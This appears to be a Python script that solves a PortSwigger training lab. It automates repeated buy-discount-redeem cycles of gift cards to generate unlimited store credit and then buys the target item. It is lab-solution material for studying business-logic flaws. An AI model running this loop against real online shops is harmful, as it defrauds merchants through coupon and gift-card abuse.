# Lab 10 — Infinite money logic flaw
# PortSwigger: https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-infinite-money
#
# Vulnerability: A discount code (SIGNUP30) can be applied when purchasing
#                a gift card, making the card cost LESS than its own
#                redeemable value — and this cycle has no cross-order reuse
#                restriction, so it can be repeated indefinitely
# Aim:           Buy the "Lightweight l33t leather jacket" using unlimited
#                store credit generated by repeatedly buying and redeeming
#                discounted gift cards
#
# Technique:
#   Each cycle: buy a gift card → apply SIGNUP30 → checkout → redeem the
#   resulting code → net profit. Repeat automatically until store credit
#   exceeds the jacket's price.
#
#   ⚠  Requires knowing the newsletter/signup discount code and gift card
#      product ID for this lab instance — script will attempt to discover
#      both automatically but may need manual confirmation.
#
# Usage: python business_logic_lab10.py <url> [cycles]

import sys
import re
import urllib3
from proxies import proxies
from business_logic_utils import (banner, section, make_session, login,
                                   find_product_id, add_to_cart, get_csrf_from_response,
                                   check_status, print_box)

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

DISCOUNT_CODE = "SIGNUP30"


def run_gift_card_cycle(session, url, gift_card_id):
    """
    Execute one full cycle: add gift card -> apply discount -> checkout ->
    extract the resulting gift card code -> redeem it. Returns True on
    apparent success.
    """
    # Add gift card to cart
    add_to_cart(session, url, gift_card_id, quantity=1)

    # Apply discount
    r_coupon = session.post(f"{url}/cart/coupon", data={"coupon": DISCOUNT_CODE})
    if r_coupon.status_code not in (200, 302):
        return False, None

    # Checkout
    r_checkout = session.post(f"{url}/cart/checkout")
    if r_checkout.status_code not in (200, 302):
        return False, None

    # Extract the resulting gift card code from the order confirmation
    code_match = re.search(r'([A-Z0-9]{10,})', r_checkout.text)
    if not code_match:
        # Try the account/orders page instead
        orders_page = session.get(f"{url}/my-account")
        code_match = re.search(r'([A-Z0-9]{10,})', orders_page.text)

    if not code_match:
        return False, None

    gift_code = code_match.group(1)

    # Redeem the gift card
    account_page = session.get(f"{url}/my-account")
    csrf = get_csrf_from_response(account_page.text)
    redeem_data = {"gift-card": gift_code}
    if csrf:
        redeem_data["csrf"] = csrf

    r_redeem = session.post(f"{url}/my-account/apply-gift-card", data=redeem_data)
    return r_redeem.status_code in (200, 302), gift_code


if __name__ == "__main__":
    banner()
    section("LAB 10 — INFINITE MONEY LOGIC FLAW (GIFT CARD DISCOUNT ABUSE)")

    if len(sys.argv) < 2:
        print("  Usage: python business_logic_lab10.py <url> [cycles]")
        sys.exit(1)

    url = sys.argv[1]
    cycles = int(sys.argv[2]) if len(sys.argv) > 2 else 500

    session = make_session(proxies)
    if not login(session, url):
        sys.exit(1)

    # ── Step 1: sign up for the newsletter to get the discount code ─────────
    print(f"\n  ── Step 1: sign up for the newsletter to obtain {DISCOUNT_CODE}\n")
    home_page = session.get(url)
    csrf = get_csrf_from_response(home_page.text)
    newsletter_data = {"email": "attacker@example.com"}
    if csrf:
        newsletter_data["csrf"] = csrf
    session.post(f"{url}/subscribe", data=newsletter_data)

    # ── Step 2: find the gift card product ────────────────────────────────────
    print("  ── Step 2: locate the gift card product\n")
    gift_card_id = find_product_id(session, url, name_fragment="gift card")

    # ── Step 3: run the cycle repeatedly ────────────────────────────────────
    print(f"\n  ── Step 3: running up to {cycles} buy→discount→redeem cycles\n")
    print("  ℹ  Each successful cycle nets a small profit. Progress printed")
    print("     every 25 cycles.\n")

    successes = 0
    for i in range(1, cycles + 1):
        ok, code = run_gift_card_cycle(session, url, gift_card_id)
        if ok:
            successes += 1

        if i % 25 == 0:
            account_page = session.get(f"{url}/my-account")
            credit_match = re.search(r'Store credit:\s*\$?([\d,]+\.\d{2})', account_page.text)
            credit = credit_match.group(1) if credit_match else "?"
            print(f"  ·  cycle {i}/{cycles} — successes so far: {successes} — store credit: ${credit}")

    # ── Step 4: check final credit and attempt the jacket purchase ──────────
    print("\n  ── Step 4: check final store credit and attempt jacket purchase\n")
    account_page = session.get(f"{url}/my-account")
    credit_match = re.search(r'Store credit:\s*\$?([\d,]+\.\d{2})', account_page.text)
    if credit_match:
        print_box("Final store credit", f"${credit_match.group(1)}")

    jacket_id = find_product_id(session, url)
    add_to_cart(session, url, jacket_id, quantity=1)
    r_final_checkout = session.post(f"{url}/cart/checkout")
    check_status(r_final_checkout, [200, 302], "Final jacket checkout")

    print()
    print("  ℹ  This mirrors the Burp macro workflow from the notes: a small")
    print("     per-cycle profit ($2-3) becomes unlimited money purely")
    print("     through automated repetition. If successes stayed at 0,")
    print("     the gift card product ID, discount code, or redemption")
    print("     field names likely differ on this lab instance — verify")
    print("     each step manually in Burp first.")
